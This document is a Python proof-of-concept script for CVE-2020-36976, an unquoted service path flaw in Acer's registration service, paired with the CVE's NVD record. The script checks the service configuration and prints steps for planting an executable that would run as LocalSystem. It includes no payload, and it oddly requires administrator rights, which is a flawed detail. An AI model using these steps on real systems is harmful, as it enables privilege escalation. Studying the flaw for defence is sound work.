CVE-2020-36976

#!/usr/bin/env python3 """ CVE-2020-36976 PoC - Acer Global Registration Service Unquoted Service Path This script demonstrates the unquoted service path vulnerability in Acer Global Registration Service. """ import os import sys import subprocess import ctypes def is_admin(): """Check if script is running with administrator privileges""" try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def check_vulnerability(): """Check if the vulnerable service exists and has unquoted path""" try: # Query the service configuration using sc command result = subprocess.run( ['sc', 'qc', 'gregsvc'], capture_output=True, text=True ) if 'gregsvc' in result.stdout.lower() or result.returncode == 0: print("[+] Acer Global Registration Service (gregsvc) found") # Check for unquoted path with spaces if 'C:\\Program Files (x86)\\Acer\\Registration' in result.stdout: print("[+] Service path is UNQUOTED - VULNERABLE") print("[*] Attack vector: Place malicious executable at:") print(" - C:\\Program Files (x86)\\Acer.exe") print(" - C:\\Program Files (x86)\\Acer Registration.exe") return True else: print("[-] Target service not found") return False except Exception as e: print(f"[-] Error checking vulnerability: {e}") return False def create_payload(payload_path): """Create a simple payload executable""" # This is a demonstration - actual payload would be malicious print(f"[*] Payload location: {payload_path}") print("[!] In real attack, this would contain malicious code") print("[!] When service restarts, payload executes with LocalSystem privileges") def main(): print("=" * 60) print("CVE-2020-36976 - Acer Global Registration Service") print("Unquoted Service Path Privilege Escalation PoC") print("=" * 60) if not is_admin(): print("[-] This script requires administrator privileges") print("[-] Please run as Administrator") sys.exit(1) print("[+] Running with administrator privileges") if check_vulnerability(): print("\n[*] To exploit this vulnerability:") print(" 1. Create a malicious executable named 'Acer.exe' or 'Acer Registration.exe'") print(" 2. Place it in C:\\Program Files (x86)\\ directory") print(" 3. Wait for service restart or restart it manually: sc stop gregsvc && sc start gregsvc") print(" 4. Payload will execute with LocalSystem privileges") create_payload('C:\\Program Files (x86)\\Acer.exe') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2020-36976", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:10.253", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Acer Global Registration Service 1.0.0.3 contains an unquoted service path vulnerability in its service configuration that allows local users to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\\Program Files (x86)\\Acer\\Registration\\ to inject malicious executables that would run with elevated LocalSystem privileges during service startup."}, {"lang": "es", "value": "Acer Global Registration Service 1.0.0.3 contiene una vulnerabilidad de ruta de servicio sin comillas en su configuración de servicio que permite a usuarios locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en C:\\Program Files (x86)\\Acer\\Registration\\ para inyectar ejecutables maliciosos que se ejecutarían con privilegios elevados de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.acer.com/ac/en/US/content/home", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49142", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/global-registration-service-gregsvcexe-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49142", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}